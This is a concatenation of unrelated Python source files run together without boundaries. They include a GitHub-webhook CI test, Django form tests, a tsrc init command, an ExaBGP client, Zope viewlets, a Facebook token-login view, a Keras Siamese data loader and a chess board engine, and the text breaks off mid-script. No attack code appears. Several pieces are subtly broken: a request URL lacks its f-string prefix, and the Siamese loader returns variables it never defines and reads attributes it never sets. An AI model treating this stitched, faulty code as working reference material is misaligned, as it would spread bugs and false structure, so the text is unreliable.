Release with version with 2.1 data = {'release': {'prerelease': True, 'published_at': '2018-05-30T20:18:44Z', 'tag_name': 'v2.1'}} sig = self.generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key']) headers = self.generate_git_api_header('release', sig) # one of ip address from github webhook wsgi_environment = {'REMOTE_ADDR': '192.168.3.11'} last_commit = GeneralData.query.filter(GeneralData.key == 'last_commit').first() # abcdefgh is the new commit after previous version defined in base.py last_commit.value = 'abcdefgh' g.db.commit() response = c.post( '/start-ci', environ_overrides=wsgi_environment, data=json.dumps(data), headers=headers) last_release = CCExtractorVersion.query.order_by(CCExtractorVersion.released.desc()).first() self.assertNotEqual(last_release.version, '2.1') def generate_signature(self, data, private_key): """ Generate signature token of hook request :param data: Signature's data :param private_key: Signature's token """ import hashlib import hmac algorithm = hashlib.__dict__.get('sha1') encoded_key = bytes(private_key, 'latin-1') mac = hmac.new(encoded_key, msg=data, digestmod=algorithm) return mac.hexdigest() def generate_git_api_header(self, event, sig): """ Create header for Github API Request :param event: Name of the event type that triggered the delivery. :param sig: The HMAC hex digest of the response body. The HMAC hex digest is generated using the sha1 hash function and the secret as the HMAC key. """ # Header information from https://developer.github.com/webhooks/ headers = Headers([('X-GitHub-Event', event), ('X-Github-Delivery', '72d3162e-cc78-11e3-81ab-4c9367dc0958'), ('X-Hub-Signature', ('sha1={0}').format(sig)), ('User-Agent', 'GitHub-Hookshot/044aadd'), ('Content-Type', 'application/json'), ('Content-Length', 6615) ]) return headersfrom django.contrib.auth.models import User from django.core.urlresolvers import reverse from django.test import TestCase, Client from reddit.forms import SubmissionForm from reddit.models import Submission from users.models import RedditUser class TestSubmissionForm(TestCase): def test_full_valid_submission(self): test_data = { 'title': 'submission_title', 'url': 'http://example.com', 'text': 'submission text' } form = SubmissionForm(data=test_data) self.assertTrue(form.is_valid()) def test_minimum_data_required(self): test_data = { 'title': 'submission title' } form = SubmissionForm(data=test_data) self.assertTrue(form.is_valid()) def test_invalid_data(self): test_data = { 'title': '.' * 300, 'url': 'notaurl', 'text': '.' * 5001 } form = SubmissionForm(data=test_data) self.assertEqual(form.errors['title'], ["Ensure this value has at most 250 characters (it has 300)."]) self.assertEqual(form.errors['url'], ["Enter a valid URL."]) self.assertEqual(form.errors['text'], ["Ensure this value has at most 5000 characters (it has 5001)."]) self.assertFalse(form.is_valid()) class TestSubmissionRequests(TestCase): def setUp(self): self.c = Client() self.login_data = { 'username': 'submissiontest', 'password': 'password' } RedditUser.objects.create( user=User.objects.create_user(**self.login_data) ) def test_logged_out(self): r = self.c.get(reverse('submit')) self.assertRedirects(r, "{}?next={}".format( reverse('login'), reverse('submit') )) def test_logged_in_GET(self): self.c.login(**self.login_data) r = self.c.get(reverse('submit')) self.assertIsInstance(r.context['form'], SubmissionForm) def test_making_a_submission(self): self.c.login(**self.login_data) test_data = { 'title': 'submission title', 'url': 'http://example.com', 'text': 'submission text' } r = self.c.post(reverse('submit'), data=test_data, follow=True) submission = Submission.objects.filter(**test_data).first() self.assertIsNotNone(submission) self.assertRedirects(r, reverse('thread', args=(submission.id,))) self.assertContains(r, 'Submission created') def test_missing_fields(self): self.c.login(**self.login_data) test_data = { 'url': 'http://example.com', 'text': 'submission text' } r = self.c.post(reverse('submit'), data=test_data) self.assertNotContains(r, 'Submission created') self.assertContains(r, 'This field is required.') tsrc/cli/init.py0 """ Entry point for `tsrc init` """ import argparse import os from path import Path import cli_ui as ui import tsrc from tsrc.workspace import Workspace from tsrc.workspace.config import WorkspaceConfig def main(args: argparse.Namespace) -> None: path_as_str = args.workspace_path or os.getcwd() workspace_path = Path(path_as_str) cfg_path = workspace_path / ".tsrc" / "config.yml" if cfg_path.exists(): raise tsrc.Error("Workspace already configured with file " + cfg_path) ui.info_1("Configuring workspace in", ui.bold, workspace_path) workspace_config = WorkspaceConfig( manifest_url=args.url, manifest_branch=args.branch, clone_all_repos=args.clone_all_repos, repo_groups=args.groups, shallow_clones=args.shallow, ) workspace_config.save_to_file(cfg_path) workspace = Workspace(workspace_path) workspace.update_manifest() workspace.clone_missing() workspace.set_remotes() workspace.copy_files() ui.info_2("Workspace initialized") ui.info_2("Configuration written in", ui.bold, workspace.cfg_path) backend/core/taps/exabgp_client.py from socketIO_client import SocketIO, BaseNamespace import argparse from kombu import Connection, Producer, Exchange from utils import mformat_validator, normalize_msg_path, key_generator, RABBITMQ_HOST, get_logger import signal log = get_logger() class ExaBGP(): def __init__(self, prefixes, host): self.host = host self.prefixes = prefixes self.sio = None signal.signal(signal.SIGTERM, self.exit) signal.signal(signal.SIGINT, self.exit) signal.signal(signal.SIGCHLD, signal.SIG_IGN) def start(self): with Connection(RABBITMQ_HOST) as connection: self.connection = connection self.exchange = Exchange( 'bgp-update', channel=connection, type='direct', durable=False) self.exchange.declare() try: self.sio = SocketIO('http://' + self.host, namespace=BaseNamespace) def exabgp_msg(bgp_message): msg = { 'type': bgp_message['type'], 'communities': bgp_message.get('communities', []), 'timestamp': float(bgp_message['timestamp']), 'path': bgp_message.get('path', []), 'service': 'exabgp|{}'.format(self.host), 'prefix': bgp_message['prefix'], 'peer_asn': int(bgp_message['peer_asn']) } if mformat_validator(msg): with Producer(connection) as producer: msgs = normalize_msg_path(msg) for msg in msgs: key_generator(msg) log.debug(msg) producer.publish( msg, exchange=self.exchange, routing_key='update', serializer='json' ) else: log.warning('Invalid format message: {}'.format(msg)) self.sio.on('exa_message', exabgp_msg) self.sio.emit('exa_subscribe', {'prefixes': self.prefixes}) self.sio.wait() except KeyboardInterrupt: self.exit() except Exception: log.exception('exception') def exit(self): print('Exiting ExaBGP') if self.sio is not None: self.sio.disconnect() self.sio.wait() if __name__ == '__main__': parser = argparse.ArgumentParser(description='ExaBGP Monitor Client') parser.add_argument('-p', '--prefix', type=str, dest='prefix', default=None, help='Prefix to be monitored') parser.add_argument('-r', '--host', type=str, dest='host', default=None, help='Prefix to be monitored') args = parser.parse_args() prefixes = args.prefix.split(',') exa = ExaBGP(prefixes, args.host) print('Starting ExaBGP on {} for {}'.format(args.host, prefixes)) try: exa.start() except BaseException: log.exception('exception') ############################################################################## # # Copyright (c) 2006-2007 Zope Foundation and Contributors. # All Rights Reserved. # # This software is subject to the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## """Grok components""" from operator import itemgetter from zope import component, interface from zope.viewlet.manager import ViewletManagerBase from zope.viewlet.viewlet import ViewletBase from grokcore.viewlet import interfaces, util @interface.implementer(interfaces.IViewletManager) class ViewletManager(ViewletManagerBase): template = None def __init__(self, context, request, view): super(ViewletManager, self).__init__(context, request, view) self.context = context self.request = request self.view = view self.__name__ = self.__view_name__ static_name = getattr(self, '__static_name__', None) if static_name is not None: self.static = component.queryAdapter( self.request, interface.Interface, name=static_name) else: self.static = None def sort(self, viewlets): """Sort the viewlets. ``viewlets`` is a list of tuples of the form (name, viewlet). """ # Sort viewlets following grok.order rule. return util.sort_components(viewlets, key=itemgetter(1)) def default_namespace(self): namespace = {} namespace['context'] = self.context namespace['request'] = self.request namespace['static'] = self.static namespace['view'] = self.view namespace['viewletmanager'] = self return namespace def namespace(self): return {} def update(self): super(ViewletManager, self).update() # Filter out the unavailable viewlets *after* the viewlet's update() # has been called. self.viewlets = [v for v in self.viewlets if v.available()] def render(self): """See zope.contentprovider.interfaces.IContentProvider""" # Now render the view if self.template: return self.template.render(self) else: return u'\n'.join([viewlet.render() for viewlet in self.viewlets]) # Mark the render() method as a method from the base class. That # way we can detect whether somebody overrides render() in a subclass. render.base_method = True class Viewlet(ViewletBase): """Batteries included viewlet. """ def __init__(self, context, request, view, manager): super(Viewlet, self).__init__(context, request, view, manager) self.context = context self.request = request self.view = view self.viewletmanager = manager self.__name__ = self.__view_name__ static_name = getattr(self, '__static_name__', None) if static_name is not None: self.static = component.queryAdapter( self.request, interface.Interface, name=static_name) else: self.static = None def default_namespace(self): namespace = {} namespace['context'] = self.context namespace['request'] = self.request namespace['static'] = self.static namespace['view'] = self.view namespace['viewlet'] = self namespace['viewletmanager'] = self.manager return namespace def namespace(self): return {} def update(self): pass def available(self): """Return True if this viewlet is to be rendered. False otherwise. Note that the available() method is called *after* update() but *before* render() has been called. """ return True def render(self): return self.template.render(self) # Mark the render() method as a method from the base class. That # way we can detect whether somebody overrides render() in a subclass. render.base_method = True import os import torch import zipfile import time as t import torchvision from tqdm import notebook import torch.nn.functional as F from IPython.display import Image, clear_output from tensorboardcolab import TensorBoardColab from torch.optim.lr_scheduler import ReduceLROnPlateau from torch.optim import SGD, Adam # Hardware Properties def hardware_specs(): return 'PyTorch %s %s' % (torch.__version__, torch.cuda.get_device_properties(0) if torch.cuda.is_available() else 'CPU') from rest_framework import serializers from db.models.classe import Classe class ClasseSerializer(serializers.ModelSerializer): class Meta: model = Classe fields = '__all__' import logging import requests from datetime import timedelta from django.utils import timezone from allauth.socialaccount import app_settings, providers from allauth.socialaccount.helpers import ( complete_social_login, render_authentication_error, ) from allauth.socialaccount.models import SocialLogin, SocialToken from allauth.socialaccount.providers.core.oauth2.views import ( ProviderView, OAuth2View, OAuth2CallbackView, OAuth2LoginView, ) from .forms import FacebookConnectForm logger = logging.getLogger(__name__) class FacebookLoginByTokenView(ProviderView): def dispatch(self, request): ret = None auth_exception = None if request.method == 'POST': form = FacebookConnectForm(request.POST) if form.is_valid(): try: provider = self.provider login_options = provider.get_fb_login_options(request) app = provider.get_app(request) access_token = form.cleaned_data['access_token'] expires_at = None if login_options.get('auth_type') == 'reauthenticate': info = requests.get(f'{provider.base_graph_url}/oauth/access_token_info', params={'client_id': app.client_id, 'access_token': access_token}).json() nonce = provider.get_nonce(request, pop=True) ok = nonce and nonce == info.get('auth_nonce') else: ok = True if ok and provider.get_settings().get('EXCHANGE_TOKEN'): resp = requests.get( '{provider.base_graph_url}/oauth/access_token', params={ 'grant_type': 'fb_exchange_token', 'client_id': app.client_id, 'client_secret': app.secret, 'fb_exchange_token': access_token }).json() access_token = resp['access_token'] expires_in = resp.get('expires_in') if expires_in: expires_at = timezone.now() + timedelta(seconds=int(expires_in)) if ok: token = SocialToken(app=app, token=access_token, expires_at=expires_at) login = provider.complete_login(request, app, token) login.token = token login.state = SocialLogin.state_from_request(request) ret = complete_social_login(request, login) except requests.RequestException as e: logger.exception('Error accessing FB user profile') auth_exception = e if not ret: ret = render_authentication_error(request, provider.id, exception=auth_exception) return ret from tensorflow.python.keras.utils.data_utils import Sequence from keras.preprocessing import image import numpy as np from keras.utils import np_utils from config import batch_size, image_size_h_c, image_size_w_c, nchannels, num_workers #------------------------------------------------------------------------------ def process_load(f1, vec_size): _i1 = image.load_img(f1, target_size=vec_size) _i1 = image.img_to_array(_i1, dtype='uint8') _i1 = ((_i1/255.0) - [0.485, 0.456, 0.406]) / [0.229, 0.224, 0.225] return _i1 def load_img(img, vec_size, vec_size2, metadata_dict, preprocess): iplt0 = process_load(img[0][0], vec_size) iplt1 = process_load(img[1][0], vec_size) d1 = { "i0":iplt0, "i1":iplt1, "l":img[2], "p1":img[0][0], "p2":img[1][0], "c1":img[3][0], "c2":img[4][0] } return d1 class SiameseSequence(Sequence): def __init__(self, features, augmentations=None, batch_size=batch_size, preprocess = None, input2=(image_size_h_c,image_size_w_c,nchannels), with_paths=False): self.features = features self.batch_size = batch_size self.vec_size = input2 self.preprocess = preprocess self.augment = augmentations self.with_paths = with_paths def __len__(self): return int(np.ceil(len(self.features) / float(self.batch_size))) def __getitem__(self, idx): start = idx * self.batch_size end = (idx + 1) * self.batch_size batch = self.features[start:end] futures = [] _vec_size = (len(batch),) + self.vec_size b1 = np.zeros(_vec_size) b2 = np.zeros(_vec_size) blabels = np.zeros((len(batch))) p1 = [] p2 = [] c1 = [] c2 = [] i1 = 0 for _b in batch: res = load_img(_b, self.vec_size, self.vec_size2, self.metadata_dict, self.preprocess) if self.augment is not None: b1[i1,:,:,:] = self.augment[0][0](image=res['i0'])["image"] b2[i1,:,:,:] = self.augment[1][0](image=res['i1'])["image"] else: b1[i1,:,:,:] = res['i0'] b2[i1,:,:,:] = res['i1'] blabels[i1] = res['l'] p1.append(res['p1']) p2.append(res['p2']) c1.append(res['c1']) c2.append(res['c2']) i1+=1 blabels = np_utils.to_categorical(np.array(blabels), 2) result = [[b3, b4], blabels] if self.with_paths: result += [[p1,p2]] return result def load_img_temporal(img, vec_size2, tam, metadata_dict): iplt2 = [process_load(img[1][i], vec_size2, None) for i in range(tam)] iplt3 = [process_load(img[3][i], vec_size2, None) for i in range(tam)] d1 = {"i2":iplt2, "i3":iplt3, "l":img[4], "p1":str(img[0]), "p2":str(img[2]), "c1":img[5]['color'], "c2":img[5]['color'] } d1['metadata'] = [] for i in range(tam): diff = abs(np.array(metadata_dict[img[0][i]][:7]) - np.array(metadata_dict[img[2][i]][:7])).tolist() for j in range(len(diff)): diff[j] = 1 if diff[j] else 0 d1['metadata'] += metadata_dict[img[0][i]] + metadata_dict[img[2][i]] + diff d1['metadata'] = np.array(d1['metadata']) return d1 class SiameseSequenceTemporal(Sequence): def __init__(self,features, augmentations, tam, metadata_dict, metadata_length, batch_size, with_paths=False): self.tam = tam self.features = features self.batch_size = batch_size self.vec_size2 = (image_size_h_c,image_size_w_c,nchannels) self.metadata_dict = metadata_dict self.metadata_length = metadata_length self.augment = augmentations self.with_paths = with_paths def __len__(self): return int(np.ceil(len(self.features) / float(self.batch_size))) def __getitem__(self, idx): start = idx * self.batch_size end = (idx + 1) * self.batch_size batch = self.features[start:end] futures = [] _vec_size2 = (len(batch),self.tam,) + self.vec_size2 b3 = np.zeros(_vec_size2) b4 = np.zeros(_vec_size2) blabels = np.zeros((len(batch))) p1 = [] p2 = [] c1 = [] c2 = [] if self.metadata_length>0: metadata = np.zeros((len(batch),self.metadata_length)) i = 0 for _b in batch: r = load_img_temporal(_b, self.vec_size2, self.tam, self.metadata_dict) for j in range(self.tam): b3[i,j,:,:,:] = self.augment[2][j](image=r['i2'][j])["image"] b4[i,j,:,:,:] = self.augment[3][j](image=r['i3'][j])["image"] blabels[i] = r['l'] p1.append(r['p1']) p2.append(r['p2']) c1.append(r['c1']) c2.append(r['c2']) if self.metadata_length>0: metadata[i,:] = r['metadata'] i+=1 blabels2 = np.array(blabels).reshape(-1,1) blabels = np_utils.to_categorical(blabels2, 2) y = {"class_output":blabels, "reg_output":blabels2} result = [[b3, b4, metadata], y] if self.with_paths: result += [[p1,p2]] return resultGRUPO-ES2-GJLRT/XADREZ_ES2 import re from collections import namedtuple Piece = namedtuple("Piece", "name position color") ## from constants import ( # Directions E, W, EMPTY, # Board A8, H1, # Pieces PAWN, KNIGHT, BISHOP, ROOK, QUEEN, KING, PIECE_EMPTY, # Colors COLOR_EMPTY, WHITE, BLACK, # Legal LEGAL, # Movements PAWN_OFFSETS, PIECE_OFFSET, PIECE_OFFSET_SIZE, NORMAL, CAPTURE, BIG_PAWN, EN_PASSANT, KINGSIDE, QUEENSIDE, # Rank SECOND_RANK, # Value Tables PAWN_TABLE, KNIGHT_TABLE, BISHOP_TABLE, ROOK_TABLE, QUEEN_TABLE, KING_EARLYGAME_TABLE, KING_ENDGAME_TABLE, # Attacked ATTACKS, RAYS, SHIFTS, # Print PRINT_ARRAY, NAMES, # Functions is_square, is_not_square, rank, next_color ) from functions import tuple_to_0x88, p0x88_to_tuple, chess_notation_to_0x88 from zobrist import ( zobrist_pieces, zobrist_castling, zobrist_color, zobrist_en_passant ) from move import Move ## class Board(object): def __init__(self, new_game): ## self.pieces = [0] * 128 self.colors = [0] * 128 self.kings = [0] * 2 self.castling = [0] * 2 self.pieces_count = [0] * 14 self.values = [0] * 128 ## if new_game: self.load_fen( "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1") else: self.clear() def clear(self): for i in range(128): self.pieces[i] = PIECE_EMPTY self.colors[i] = COLOR_EMPTY self.values[i] = 0 for i in range(7): self.pieces_count[WHITE * 7 + i] = 0 self.pieces_count[BLACK * 7 + i] = 0 self.kings[WHITE] = EMPTY self.kings[BLACK] = EMPTY self.current_color = WHITE self.castling[0] = 0 self.castling[1] = 0 self.en_passant_square = EMPTY self.half_moves = 0 self.moves = 1 self.hash = 0 self.pieces_list = [] self.last_hash = 0 self.black_value = 23902 self.white_value = 23902 def clone(self): result = Board(False) for i in range(128): result.pieces[i] = self.pieces[i] result.colors[i] = self.colors[i] result.values[i] = self.values[i] for i in range(7): result.pieces_count[i] = self.pieces_count[i] result.pieces_count[7 + i] = self.pieces_count[7 + i] result.kings[WHITE] = self.kings[WHITE] result.kings[BLACK] = self.kings[BLACK] result.current_color = self.current_color result.castling[WHITE] = self.castling[WHITE] result.castling[BLACK] = self.castling[BLACK] result.en_passant_square = self.en_passant_square result.half_moves = self.half_moves result.moves = self.moves result.hash = self.hash result.last_hash = self.last_hash result.pieces_list = self.pieces_list result.black_value = self.black_value result.white_value = self.white_value return result def add(self, piece, color, square): self.pieces[square] = piece self.colors[square] = color if piece == KING: self.kings[color] = square self.pieces_count[color * 7 + piece] += 1 self.hash ^= zobrist_pieces[piece][color][square] def remove(self, square): piece = self.pieces[square] color = self.colors[square] if piece: self.hash ^= zobrist_pieces[piece][color][square] if piece == KING: self.kings[color] = PIECE_EMPTY self.pieces[square] = PIECE_EMPTY self.colors[square] = COLOR_EMPTY self.pieces_count[color * 7 + piece] -= 1 def hindered(self, color): result = set() attack_moves = self.attack_moves(-1, color) for move in attack_moves: result.add( p0x88_to_tuple(move.destination()) ) return result def get_value(self): self.white_value = 0 self.black_value = 0 result = 0 for i in range(A8, H1 + 1): if is_not_square(i): i = i + 7 continue result += self.values[i] if self.colors[i] == WHITE: self.white_value += self.values[i] elif self.colors[i] == BLACK: self.black_value += -self.values[i] return result def possible_moves(self, color): result = self.generate_moves(LEGAL, EMPTY, color) result.sort(reverse=True, key=move_key) return result def possible_killing_moves(self, color): result = set() moves = self.generate_moves(LEGAL, EMPTY, color) for move in moves: if move.get_flags() & (CAPTURE | EN_PASSANT): result.add(move) return result def color(self): return self.current_color def current_king_position(self): return p0x88_to_tuple(self._current_king_position()) def move(self, original_position, new_position, promotion): dest = tuple_to_0x88(new_position) moves = self.generate_moves( LEGAL, tuple_to_0x88(original_position), COLOR_EMPTY, ) for move in moves: if move.destination() == dest: move.set_promotion(promotion) move.do_update(self) return move return False def piece_moves(self, position): square = tuple_to_0x88(position) color = self.colors[square] moves = self.generate_moves( LEGAL, square, color, ) return moves def piece_attack_moves(self, position): square = tuple_to_0x88(position) color = self.colors[square] moves = self.attack_moves( square, color, ) return moves def at(self, position): square = tuple_to_0x88(position) color = self.colors[square] piece = self.pieces[square] if piece == PIECE_EMPTY: return None result = "white " if color == WHITE else "black " result += NAMES[piece] return result def load_fen(self, fen): self.clear() tokens = re.compile("\s+").split(fen) position = tokens[0] y = 7 x = 0 for piece in position: if piece == '/': y -= 1 x = 0 elif piece == '1': x += 1 elif piece == '2': x += 2 elif piece == '3': x += 3 elif piece == '4': x += 4 elif piece == '5': x += 5 elif piece == '6': x += 6 elif piece == '7': x += 7 elif piece == '8': x += 8 else: square = (7 - y) * 16 + x color = WHITE lp = piece.lower() if piece == lp: color = BLACK if lp == 'p': self.add(PAWN, color, square) self.values[square] = self.piece_value(PAWN, color, square) elif lp == 'n': self.add(KNIGHT, color, square) self.values[square] = self.piece_value(KNIGHT, color, square) elif lp == 'b': self.add(BISHOP, color, square) self.values[square] = self.piece_value(BISHOP, color, square) elif lp == 'r': self.add(ROOK, color, square) self.values[square] = self.piece_value(ROOK, color, square) elif lp == 'q': self.add(QUEEN, color, square) self.values[square] = self.piece_value(QUEEN, color, square) elif lp == 'k': self.add(KING, color, square) self.values[square] = self.piece_value(KING, color, square) x += 1 if tokens[1] == 'w': self.current_color = WHITE else: self.current_color = BLACK self.hash ^= zobrist_color if tokens[2] != '-': for c in tokens[2]: if c == 'K': self.castling[WHITE] |= KINGSIDE elif c == 'Q': self.castling[WHITE] |= QUEENSIDE elif c == 'k': self.castling[BLACK] |= KINGSIDE elif c == 'q': self.castling[BLACK] |= QUEENSIDE self.hash ^= zobrist_castling[self.castle()] if tokens[3] != '-': self.en_passant_square = chess_notation_to_0x88(tokens[3]) self.hash ^= zobrist_en_passant[self.en_passant_square] self.half_moves = int(tokens[4]) self.moves = int(tokens[5]) def castle(self): return ( (self.castling[WHITE] >> 4 >> 1) | (self.castling[BLACK] >> 2 >> 1) ) def attack_moves(self, square, color): moves = [] current = color first = A8 last = H1 if (current == -1): current = self.current_color if is_square(square): first = square last = square for i in range(first, last + 1): if is_not_square(i): i = i + 7 continue if self.colors[i] != current: continue piece = self.pieces[i] if piece == PAWN: for j in range(2, 4): square = i + PAWN_OFFSETS[current][j] if is_not_square(square): continue if self.colors[square] != current: moves.append(Move(self, current, i, square, CAPTURE)) else: for j in range(0, PIECE_OFFSET_SIZE[piece]): offset = PIECE_OFFSET[piece][j] square = i while True: square += offset if is_not_square(square): break if not self.pieces[square]: moves.append( Move(self, current, i, square, NORMAL)) else: if self.colors[square] == current: break moves.append( Move(self, current, i, square, CAPTURE)) break # Stop after first move for king and knight if (piece == KING or piece == KNIGHT): break return moves def generate_moves(self, legal, square, color): moves = [] current = color first = A8 last = H1 single = 0 if current == COLOR_EMPTY: current = self.current_color other = next_color(current) if is_square(square): first = square last = square single = 1 for i in range(first, last + 1): if is_not_square(i): i = i + 7 continue if self.colors[i] != current: continue piece = self.pieces[i] if piece == PAWN: # 1 step forward square = i + PAWN_OFFSETS[current][0] if not self.pieces[square]: moves.append(Move(self, current, i, square, NORMAL)) # 2 steps forward square = i + PAWN_OFFSETS[current][1] if (rank(i) == SECOND_RANK[current] and not self.pieces[square]): moves.append(Move(self, current, i, square, BIG_PAWN)) # Captures for j in range(2, 4): square = i + PAWN_OFFSETS[current][j] if is_not_square(square): continue if self.pieces[square] and self.colors[square] == other: moves.append(Move(self, current, i, square, CAPTURE)) elif square == self.en_passant_square: moves.append( Move(self, current, i, square, EN_PASSANT)) else: for j in range(0, PIECE_OFFSET_SIZE[piece]): offset = PIECE_OFFSET[piece][j] square = i while True: square += offset if is_not_square(square): break if not self.pieces[square]: moves.append( Move(self, current, i, square, NORMAL)) else: if self.colors[square] == current: break moves.append( Move(self, current, i, square, CAPTURE)) break # Stop after first for king and knight if (piece == KING or piece == KNIGHT): break # Castling if ((not single or last == self.kings[current]) and self.kings[current] != EMPTY): if self.castling[current] & KINGSIDE: origin = self.kings[current] dest = origin + E + E if (not self.pieces[origin + E] and not self.pieces[dest] and not self.attacked(origin, other) and not self.attacked(origin + E, other) and not self.attacked(dest, other)): moves.append(Move(self, current, origin, dest, KINGSIDE)) if self.castling[current] & QUEENSIDE: origin = self.kings[current] dest = origin + W + W if (not self.pieces[origin + W] and not self.pieces[origin + W + W] and not self.pieces[origin + W + W + W] and not self.pieces[dest] and not self.attacked(origin, other) and not self.attacked(origin + W, other) and not self.attacked(dest, other)): moves.append(Move(self, current, origin, dest, QUEENSIDE)) if not legal: return moves legal_moves = [] for move in moves: move.do(self) if not self.in_check(current): legal_moves.append(move) #else: # self.display() move.undo(self) return legal_moves def attacked(self, square, color): for i in range(A8, H1 + 1): if is_not_square(i): i = i + 7 continue if self.colors[i] != color: continue piece = self.pieces[i] diff = i - square diff_0x88 = 0x77 + diff if ATTACKS[diff_0x88] & (1 << SHIFTS[piece]): if piece == PAWN: if ((diff > 0 and color == WHITE) or (diff <= 0 and color == BLACK)): return True continue if piece == KING or piece == KNIGHT: return True offset = RAYS[diff_0x88] j = i + offset blocked = False while j != square: if self.pieces[j]: blocked = True break j += offset if not blocked: return True return False def in_check(self, color): if color == COLOR_EMPTY: color = self.current_color if self.kings[color] == EMPTY: return False return self.attacked(self.kings[color], next_color(color)) def _current_king_position(self): return self.kings[self.current_color] def display(self): print(" a b c d e f g h") for irow in range(8): s = "%d" % (8 - irow) for icol in range(8): sq = irow * 16 + icol s += " %c" % PRINT_ARRAY[self.colors[sq]][self.pieces[sq]] print(s) print(" a b c d e f g h\n") def display_values(self): print(" a b c d e f g h ") for irow in range(8): s = "%d " % (8 - irow) for icol in range(8): sq = irow * 16 + icol num = str(self.values[sq]) s += "%s%s" % (num, " " * (7 - len(num))) print(s) print(" a b c d e f g h ") def status(self, possible_moves): if not possible_moves: possible_moves = self.generate_moves(LEGAL, EMPTY, COLOR_EMPTY) in_check = self.in_check(COLOR_EMPTY) if in_check and not possible_moves: return "checkmate" if in_check: return "check" if not possible_moves: return "stalemate" if self.half_moves >= 50: return "fifty move" return 'normal' def get_pieces(self): if self.hash != self.last_hash: pieces_list = [] for i in range(A8, H1 + 1): if is_not_square(i): i = i + 7 continue if (self.pieces[i] == PIECE_EMPTY or self.colors[i] == COLOR_EMPTY): continue pieces_list.append(Piece( name=NAMES[self.pieces[i]], position=p0x88_to_tuple(i), color="white" if self.colors[i] == WHITE else "black", )) self.pieces_list = pieces_list self.last_hash = self.hash return self.pieces_list def get_hash(self): return self.hash def count(self, color, piece): return self.pieces_count[color * 7 + piece] def piece_value(self, piece, color, square): if color == WHITE: mult = 1 else: mult = -1 square = square ^ 0x77 if piece == PIECE_EMPTY: return 0 if piece == PAWN: return mult * (100 + PAWN_TABLE[square]) elif piece == KNIGHT: return mult * (300 + KNIGHT_TABLE[square]) elif piece == BISHOP: return mult * (301 + BISHOP_TABLE[square]) elif piece == ROOK: return mult * (500 + ROOK_TABLE[square]) elif piece == QUEEN: return mult * (900 + QUEEN_TABLE[square]) elif piece == KING: if self.is_endgame(): return mult * (20000 + KING_ENDGAME_TABLE[square]) else: return mult * (20000 + KING_EARLYGAME_TABLE[square]) def is_endgame(self): return ( (self.black_value < 21500 and self.white_value < 21500) or (self.black_value < 21000 or self.white_value < 21000) ) def get_pieces_count(self): the_sum = 0 for i in range(14): the_sum += self.pieces_count[i] return the_sum @staticmethod def is_valid_position(position): """ Check if position is inside the board """ return 0 <= position[0] < 8 and 0 <= position[1] < 8 @staticmethod def chess_notation_to_position(chess_notation): """ Convert chess notation (a1) to position (0, 0) """ return ( ord(chess_notation[0]) - 97, int(chess_notation[1]) - 1 ) def move_key(move): return move.score() 1-10 print("Top of the morning to ya")nchaparr/Geospatial-Analysis-with-Python1138_04_01-site-packages.py0 # Locate your Python site-packages directory import sys # Try the last path in the list print sys.path[-1] # Otherwise look at the whole list manually print sys.path from __future__ import annotations import os import time from collections.abc import Callable, Iterable from pathlib import Path from typing import TYPE_CHECKING, cast import pytest from attrs import define, field from environs import Env from hypothesis import HealthCheck, settings from loguru import logger from marshmallow.validate import OneOf if TYPE_CHECKING: from types import ModuleType from flask.testing import FlaskClient from holdmypics import Holdmypics MAX_LOG_SIZE = 3 * (1024**2) PROFILES = { "ci": {"max_examples": 25, "derandomize": True}, "dev": {"max_examples": 15}, } @define(frozen=True) class AppFactory(object): factory: Callable[[ModuleType], Holdmypics] = field(repr=False) config: ModuleType = field(repr=False) def __call__(self) -> Holdmypics: return self.factory(self.config) def configure_logging(): fmt = ( "[{time:YYYY-MM-DD HH:mm:ss.SSS}] {level:<8} " "{name}:{line} - {message}" ) log_file = os.path.join("log", "holdmytests.log") log_kw = { "format": fmt, "level": "DEBUG", "compression": "tar.gz", "retention": 5, "rotation": MAX_LOG_SIZE, } logger.add(log_file, **log_kw) def pytest_configure(config: pytest.Config): env = Env() env.read_env() # configure_logging() deadline = env.timedelta("HYPOTHESIS_DEADLINE", default=None) common_settings = settings( suppress_health_check=(HealthCheck.data_too_large,), deadline=deadline ) for name in PROFILES: settings.register_profile(name, common_settings, **PROFILES[name]) profile = env("HYPOTHESIS_PROFILE", default="ci", validate=[OneOf(PROFILES)]) settings.load_profile(profile) @pytest.fixture(scope="session", name="config") def config_fixture( tmp_path_factory: pytest.TempPathFactory, pytestconfig: pytest.Config ) -> ModuleType: import config as _config image_dir = pytestconfig.getoption("--image-dir", None) # type: ignore if image_dir is not None: image_dir = Path(cast(str, image_dir)).resolve() else: image_dir = tmp_path_factory.mktemp("holdmypics-images") logger.info("Image dir: {0}", image_dir) test_config = { "DEBUG": False, "SAVED_IMAGES_MAX_SIZE": 1024 * 10, "LOG_FILE_NAME": "holdmypics-test", "SAVED_IMAGES_CACHE_DIR": image_dir, } _config.__dict__.update(test_config) for key, value in test_config.items(): assert key in _config.__dict__ _config.__dict__[key] = value _config.__dict__["TESTING"] = True return _config @pytest.fixture(scope="module", name="app_factory") def app_factory_fixture(config: ModuleType) -> AppFactory: from holdmypics import create_app return AppFactory(create_app, config) @pytest.fixture() def app(app_factory: AppFactory) -> Holdmypics: return app_factory() @pytest.fixture() def client(app: Holdmypics) -> Iterable[FlaskClient]: with app.test_client() as client: yield client @pytest.fixture() def time_test(request: pytest.FixtureRequest): start = time.perf_counter() yield None func = cast(Callable, request.function) name = func.__name__ logger.debug("Timed {0!r} - Elapsed: {1:.4f}", name, time.perf_counter() - start) alexjago/ppau-graphics #!/usr/bin/env python3 ################################################################################ #### ABOUT: #### #### Get unique fontnames out of the SVGs in the artwork directory. #### #### The names will be placed in a file. ################################################################################ SOURCE_DIR = "Artwork" # default: "Artwork" OUTPUT_FILE = "FONTLIST.json" # default: "FONTLIST.txt" ################################################################################ #### You shouldn't need to ever edit anything below this comment. #### ################################################################################ VERSION = "0.0.1" import subprocess import argparse import re import json # Parse Arguments parser = argparse.ArgumentParser(description="Collate the fonts used.", prog="PPAU-Graphics Font Lister") 